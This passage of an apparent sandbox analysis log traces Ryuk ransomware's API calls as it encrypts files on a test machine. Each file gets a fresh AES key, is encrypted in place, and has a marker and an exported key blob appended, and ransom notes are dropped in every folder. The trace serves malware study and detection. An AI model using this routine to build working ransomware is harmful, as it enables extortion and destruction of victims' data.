(lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.464] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.464] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.465] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0151.465] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0151.465] SetLastError (dwErrCode=0x0) [0151.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\iiXiax\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\iixiax\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.465] GetLastError () returned 0x0 [0151.465] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0151.466] CloseHandle (hObject=0x190) returned 1 [0151.466] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0151.466] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0151.467] SetLastError (dwErrCode=0x0) [0151.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\edPd0CL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\edpd0cl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.467] GetLastError () returned 0xb7 [0151.467] CloseHandle (hObject=0x18c) returned 1 [0151.467] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.467] SetLastError (dwErrCode=0x0) [0151.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.467] GetLastError () returned 0xb7 [0151.467] CloseHandle (hObject=0x18c) returned 1 [0151.467] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0151.467] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.467] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.467] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.468] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\IGx-Nfv9-V7znPz0q8.doc", dwFileAttributes=0x80) returned 1 [0151.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\IGx-Nfv9-V7znPz0q8.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\faxfzo\\igx-nfv9-v7znpz0q8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.468] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=41847) returned 1 [0151.468] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=41847) returned 1 [0151.468] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xa255, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.468] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.469] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.469] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.469] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.470] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.470] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa377, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xa377, lpOverlapped=0x0) returned 1 [0151.470] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.471] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xa377, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xa380) returned 1 [0151.471] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.471] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa380, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xa380, lpOverlapped=0x0) returned 1 [0151.471] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.471] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.471] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.472] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.472] CloseHandle (hObject=0x190) returned 1 [0151.492] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.497] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.497] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.497] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.497] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.497] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\ilh0H.png", dwFileAttributes=0x80) returned 1 [0151.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\ilh0H.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\faxfzo\\ilh0h.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.498] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=66157) returned 1 [0151.498] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=66157) returned 1 [0151.498] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1014b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.498] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.499] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.499] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.499] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.499] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.499] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1026d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1026d, lpOverlapped=0x0) returned 1 [0151.500] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.501] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1026d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x10270) returned 1 [0151.501] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.501] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10270, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x10270, lpOverlapped=0x0) returned 1 [0151.501] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.502] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.502] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.502] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.502] CloseHandle (hObject=0x190) returned 1 [0151.520] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.525] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.525] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.525] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.526] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\K5cix7mcUK3z94BvtHK_.mp4", dwFileAttributes=0x80) returned 1 [0151.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\K5cix7mcUK3z94BvtHK_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\faxfzo\\k5cix7mcuk3z94bvthk_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.526] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=57973) returned 1 [0151.526] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=57973) returned 1 [0151.526] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xe153, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.526] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.527] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.527] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.527] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.527] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.527] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe275, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xe275, lpOverlapped=0x0) returned 1 [0151.529] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.529] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xe275, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xe280) returned 1 [0151.529] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.529] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe280, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xe280, lpOverlapped=0x0) returned 1 [0151.529] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.530] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.530] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.530] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.530] CloseHandle (hObject=0x190) returned 1 [0151.549] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.554] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.554] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.554] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0151.554] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0151.554] SetLastError (dwErrCode=0x0) [0151.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\FaXFZo\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\faxfzo\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.556] GetLastError () returned 0x0 [0151.556] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0151.557] CloseHandle (hObject=0x18c) returned 1 [0151.557] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.558] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\GcQiI9ya_FLQk nDl5Uv.mp3", dwFileAttributes=0x80) returned 1 [0151.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\GcQiI9ya_FLQk nDl5Uv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\gcqii9ya_flqk ndl5uv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.558] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=99616) returned 1 [0151.558] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=99616) returned 1 [0151.558] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x183fe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.558] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0151.559] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.559] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0151.559] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.559] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.559] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18520, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x18520, lpOverlapped=0x0) returned 1 [0151.561] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0151.561] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18520, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18530) returned 1 [0151.561] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.561] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18530, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x18530, lpOverlapped=0x0) returned 1 [0151.562] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0151.562] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.562] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.562] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0151.562] CloseHandle (hObject=0x18c) returned 1 [0151.586] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.590] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.590] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.590] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\IHI2xtYc.odt", dwFileAttributes=0x80) returned 1 [0151.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\IHI2xtYc.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\ihi2xtyc.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.591] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=14723) returned 1 [0151.591] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=14723) returned 1 [0151.591] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x3861, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.591] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0151.591] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.592] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0151.592] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.592] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.592] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3983, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x3983, lpOverlapped=0x0) returned 1 [0151.592] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0151.592] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x3983, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x3990) returned 1 [0151.592] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.592] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3990, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x3990, lpOverlapped=0x0) returned 1 [0151.592] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0151.592] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.593] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0151.593] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0151.593] CloseHandle (hObject=0x18c) returned 1 [0151.614] VirtualFree (lpAddress=0x2760000, dwSize=0x0, 